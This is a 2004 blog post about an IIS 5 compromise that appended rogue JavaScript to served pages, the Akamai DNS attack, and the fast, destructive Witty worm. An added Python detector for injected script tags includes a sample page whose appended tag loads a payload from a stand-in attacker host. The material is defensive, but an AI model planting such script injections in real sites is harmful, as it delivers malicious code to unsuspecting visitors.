
June 24, 2004

Widespread IIS Attack Surfaces - Attack Sophistication Increases

Yet another in a steady stream of internet attacks employing unusual attack vectors surfaced today. The Computer Emergency Response Team (CERT) reported this afternoon that a widespread compromise involving Microsoft Internet Information Server 5 has been observed, and is at the present time still propagating throughout the 'net. Although very little information has been released as of yet, apparently the exploit causes IIS to append rogue JavaScript to the bottom of the web pages it serves. Once the web page is downloaded into the client browser, the rogue code executes and calls a file hosted on another server. This file may contain malicious code which then executes on the user's system.
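The mechanism described above (a complete page with a script tag appended after it, pulling code from a different host) is something a site operator can check for in their own served responses. The following is an added example, not code from the original post or from CERT; the sample response and the hostnames in it are constructed for illustration:

```python
import re
from urllib.parse import urlparse

# Constructed sample response: an otherwise normal page that has had a
# script tag appended after the closing </html>, loading code from a
# foreign host. Both hostnames are made up for this example.
SAMPLE_RESPONSE = """<html><head><title>Welcome</title>
<script src="/js/site.js"></script></head>
<body><p>Hello</p></body></html>
<script src="http://evil.example.invalid/payload.js"></script>
"""

SCRIPT_SRC_RE = re.compile(
    r'<script\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)
HTML_CLOSE_RE = re.compile(r'</html\s*>', re.IGNORECASE)


def find_suspicious_scripts(html: str, served_host: str):
    """Return (src, reasons) pairs for script tags an operator should review.

    Two independent signals, matching the behaviour described in the post:
    - 'trailing': the tag sits after the last </html>, i.e. it was tacked
      onto an already complete document;
    - 'external': the src points at a host other than the one serving
      the page.
    A tag can trigger both, either, or neither; only tagged ones are returned.
    """
    closes = list(HTML_CLOSE_RE.finditer(html))
    end_idx = closes[-1].start() if closes else -1

    findings = []
    for m in SCRIPT_SRC_RE.finditer(html):
        src = m.group(1)
        reasons = []
        if end_idx != -1 and m.start() > end_idx:
            reasons.append("trailing")
        host = urlparse(src).hostname
        # Relative URLs have no hostname and are treated as same-origin.
        if host and host.lower() != served_host.lower():
            reasons.append("external")
        if reasons:
            findings.append((src, reasons))
    return findings


if __name__ == "__main__":
    for src, reasons in find_suspicious_scripts(SAMPLE_RESPONSE, "www.example.com"):
        print(f"{src}: {', '.join(reasons)}")
```

Run against a crawl of your own pages (fetching each URL and passing the body and your hostname), a hit on 'trailing' is the stronger signal, since legitimate templates rarely emit markup after the closing tag; 'external' alone will also flag ordinary third-party scripts and needs an allow-list of hosts you expect.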

This attack comes after last week's compromise of Akamai Networks in which service was interrupted to four of the world's largest websites, including Microsoft and Google. Akamai, an intensely secretive provider of domain name to IP address mapping services, at first blamed the outage on a widespread DDoS attack on their network. However, after being called on that story by Keynote Systems and Arbor Networks, officials at Akamai have since admitted that the attack specifically targeted DNS servers on their network.

Attacks such as these highlight a growing trend away from script-kiddie trojans and viruses toward a much more professional and well-informed scenario. These types of attacks require a thorough knowledge not only of code and operating systems, but also of the topology of the network and the way in which network services interact and build on one another. A thorough analysis of the target and the identification of the weakest link in the distributed system is the hallmark of this new breed of attacker.

On March 20 of this year, amidst headlines trumpeting Nimda, Slammer, and Blaster, W32.Witty.Worm was released into the wild. While not as media-friendly as its bigger cousins, the ramifications of the construction and performance of this particular worm are much more threatening to the future of the internet, and much more telling of the sophistication of this new breed of attacker.

Several characteristics make this attack stand out as setting a historical precedent.

Firstly, Witty was speedily written. The details of the vulnerability that Witty exploited were first published on March 18. Two days later Witty was released into the wild. Even with this level of speed, Witty was very cleverly constructed. The core code consisted of only 637 bytes; however, Witty cleverly made use of a random number generator to vary the size of the file that was delivered to the target in order to evade IDS signatures and heuristic algorithms. This use of a random number generator also allowed Witty to target randomly-generated IP addresses on random ports. Further, once the code is in place it proceeds to wipe out random 128-sector blocks on the first eight hard drives that it finds attached to the infected system. And the code was bug free. That fact would suggest either that the author was an incredibly good programmer, or that some time was spent testing the worm before it was released.

Secondly, Witty targeted a vulnerability in security software, not simply an OS vulnerability. While it only managed to infect approximately 12,000 machines, this was the entire installed userbase. And by entering the 'net through a bot network of 100 or so rogue machines and also by clever use of its random number generator it was able to do so in 45 minutes. Once again, we see that the attacker used a specific underlying root vulnerability to inflict maximum damage in the shortest time possible.

Clearly, the stakes of the security game are rising. And they are rising at an almost exponential pace. One shudders to think of the possibilities should these, for now, isolated techniques be brought together. Especially if the resources of a rogue nation-state were to be utilized in the process. To quote an oft-overused Chinese insult, "May you live in interesting times."

Posted by bcoffee at June 24, 2004 10:02 PM
